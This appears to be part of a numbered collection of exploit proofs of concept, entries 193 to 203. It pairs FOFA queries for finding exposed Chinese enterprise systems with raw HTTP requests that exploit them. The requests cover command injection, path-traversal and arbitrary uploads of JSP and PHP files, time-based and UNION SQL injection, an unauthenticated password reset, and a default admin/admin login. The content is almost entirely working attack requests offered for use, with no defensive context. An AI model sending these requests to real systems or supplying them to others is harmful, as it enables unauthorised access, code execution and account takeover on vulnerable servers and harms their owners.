<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 (Hillstone Networks security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (internet behavior management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (Entsoft customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the POC to obtain the CSRF token, then obtain a cookie, then upload and request the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder all-media news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR (Redsea Cloud EHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--